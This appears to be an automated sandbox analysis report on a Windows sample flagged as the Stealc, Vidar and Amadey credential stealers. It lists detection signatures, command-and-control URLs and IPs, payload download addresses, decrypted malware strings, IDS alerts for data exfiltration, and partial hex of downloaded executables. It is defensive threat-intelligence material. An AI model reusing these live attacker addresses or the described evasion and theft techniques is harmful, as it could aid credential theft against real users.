Windows Analysis Report
Zachv5lCuu.exe

Overview

General Information

Sample name: Zachv5lCuu.exe
renamed because original name is a hash value
Original sample name: 362aadbd9dc628c321bc33892046b8c1.exe
Analysis ID: 1464470
MD5: 362aadbd9dc628c321bc33892046b8c1
SHA1: f8831ff7c1fa70f4d56985b08daada57758c3171
SHA256: 11f5b01983cd221e28aa672906d313ca45dc0ed41f351602779590576104c52e
Tags: 32exeStealctrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Zachv5lCuu.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeOpera Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exeAm Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exephprefoxrefox Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe50673b5d7 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllv Avira URL Cloud: Label: malware
Source: http://85.28.47.4/20475a59bac849d.php7 Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe~ Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 0000000D.00000002.1636866589.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.3232.11.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: Zachv5lCuu.exe ReversingLabs: Detection: 55%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Zachv5lCuu.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: lstrcatA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: OpenEventA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateEventA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CloseHandle
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: Sleep
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VirtualFree
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: lstrlenA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ExitProcess
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: user32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ntdll.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateDCA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: sscanf
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: HAL9TH
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: JohnDoe
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: DISPLAY
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: http://85.28.47.4
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: /920475a59bac849d.php
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: /69934896f997d5bb/
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: default
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalLock
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: HeapFree
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetFileSize
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalSize
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: Process32Next
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: Process32First
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: LocalFree
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: FindClose
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ReadFile
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: WriteFile
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CopyFileA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetLastError
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalFree
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: OpenProcess
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: ole32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: wininet.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: shell32.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: psapi.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: SelectObject
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: BitBlt
Source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CCB6C80
Uses 32bit PE files
Source: Zachv5lCuu.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Zachv5lCuu.exe, 00000000.00000002.1547785998.000000006CEDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.7:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.7:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.7:49704
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.7:49704 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.7:49704
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.7:49717 -> 77.91.77.82:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.82:80 -> 192.168.2.7:49717
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.7:49719 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.7:49720 -> 77.91.77.82:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 19:47:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 